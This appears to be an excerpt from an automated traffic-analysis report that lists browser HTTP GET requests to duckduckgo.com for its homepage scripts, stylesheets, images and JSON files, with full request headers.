        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6670-c4545a71dfc7a774.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8434-81496f6f33c6bc97.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/%5Blocale%5D-243ab4cdb820daa9.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/B-ys9soUGnFD59xVO_HFJ/_buildManifest.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/B-ys9soUGnFD59xVO_HFJ/_ssgManifest.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/css/70e12d59aa4832cd.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-6185e562568e6345.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1617-8c004864fca5b9d3.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1740-e0a18841e5b93473.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6759-9f9ea0a9a829d630.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-19baaf6675f9027b.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9239-fc9e093bd4420738.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-09222264323827fc.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/117-b363b5bad35a955b.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3133.60921f077c442aa1.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /country.json HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /privacy-pro-eligible.json HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/homepage-btf-mobile-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/homepage-btf-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /_next/static/media/macos.e15f833d.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /_next/data/B-ys9soUGnFD59xVO_HFJ/about.json HTTP/1.1host: duckduckgo.comx-nextjs-data: 1sec-ch-ua-platform: "Windows"purpose: prefetchuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /_next/static/media/chrome-lg.a4859fb2.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /_next/static/media/edge-lg.36af7682.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /_next/static/media/firefox-lg.8efad702.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /_next/static/media/opera-lg.237c4418.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/search-protection-ios-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-back-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-front-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/web-protection-ios-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/email-protection-front-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/email-protection-back-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/email-protection-ios-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/search-protection-front-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/search-protection-back-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/app-protection-back-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/app-protection-front-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/app-protection-android-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4022-f9b0d7298e473079.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/about-bfc787bd96bcc6c8.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
        Source: global trafficHTTP traffic detected: GET /country.json HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /privacy-pro-eligible.json HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /_next/static/css/f9b91cd30bc88454.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/homepage-btf-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /_next/static/media/macos.e15f833d.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /_next/static/media/chrome-lg.a4859fb2.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
